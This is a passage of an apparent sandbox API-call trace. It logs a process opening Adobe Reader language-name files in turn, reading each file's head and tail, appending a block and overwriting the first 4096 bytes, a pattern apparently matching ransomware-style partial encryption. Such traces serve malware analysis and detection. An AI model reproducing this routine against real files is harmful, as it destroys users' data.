nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.733] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.733] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.733] CloseHandle (hObject=0x1ec) returned 1 [0085.734] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.734] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.735] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6ec8 [0085.735] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.735] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.735] ReleaseMutex (hMutex=0x168) returned 1 [0085.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_AR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_AR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_AR.txt", lpUsedDefaultChar=0x0) returned 30 [0085.735] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.738] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.738] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.739] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.739] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.740] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.740] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.740] CloseHandle (hObject=0x1ec) returned 1 [0085.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_es_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.742] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.742] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6ec8 [0085.742] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.743] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.743] ReleaseMutex (hMutex=0x168) returned 1 [0085.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_ES_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0085.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_ES_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa538c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_ES_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0085.743] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.745] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.745] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.746] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.747] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.748] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.748] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.748] CloseHandle (hObject=0x1ec) returned 1 [0085.748] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_py.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.750] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.750] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6ec8 [0085.750] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.750] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.750] ReleaseMutex (hMutex=0x168) returned 1 [0085.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PY.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PY.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_PY.txt", lpUsedDefaultChar=0x0) returned 30 [0085.750] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.753] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.753] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.753] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5ec8 [0085.754] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.754] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.755] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.755] CloseHandle (hObject=0x1ec) returned 1 [0085.755] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.758] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.758] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6d74 [0085.758] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.758] ReleaseMutex (hMutex=0x168) returned 1 [0085.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi.txt", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fi.txt", lpUsedDefaultChar=0x0) returned 27 [0085.759] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.761] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5d74 [0085.761] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.762] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5d74 [0085.762] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.763] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0085.763] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.764] CloseHandle (hObject=0x1ec) returned 1 [0085.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.766] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0085.766] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6e28 [0086.020] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.020] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.020] ReleaseMutex (hMutex=0x168) returned 1 [0086.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hr.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0086.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hr.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.hr.txt", lpUsedDefaultChar=0x0) returned 27 [0086.021] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.035] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5e28 [0086.036] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.036] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5e28 [0086.036] WriteFile (in: hFile=0x1ec, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.037] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0086.037] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.037] CloseHandle (hObject=0x1ec) returned 1 [0086.038] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0086.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x656a [0086.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.044] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.045] ReleaseMutex (hMutex=0x168) returned 1 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja.txt", cchWideChar=27, lpMultiByteStr=0x1f8fedc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ja.txt", lpUsedDefaultChar=0x0) returned 27 [0086.045] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.047] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x556a [0086.048] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.048] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x556a [0086.048] WriteFile (in: hFile=0x1d4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.049] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0086.049] WriteFile (in: hFile=0x1d4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.049] CloseHandle (hObject=0x1d4) returned 1 [0086.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lv_LV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lv_lv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0086.051] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.051] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6aae [0086.051] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.051] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.051] ReleaseMutex (hMutex=0x168) returned 1 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lv_LV.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lv_LV.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.lv_LV.txt", lpUsedDefaultChar=0x0) returned 30 [0086.051] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.054] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5aae [0086.055] ReadFile (in: hFile=0x1d4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.055] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5aae [0086.056] WriteFile (in: hFile=0x1d4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.068] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0086.068] WriteFile (in: hFile=0x1d4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.069] CloseHandle (hObject=0x1d4) returned 1 [0086.069] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0086.071] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.072] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6df2 [0086.072] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0086.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.072] ReleaseMutex (hMutex=0x168) returned 1 [0086.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nn_NO.txt", 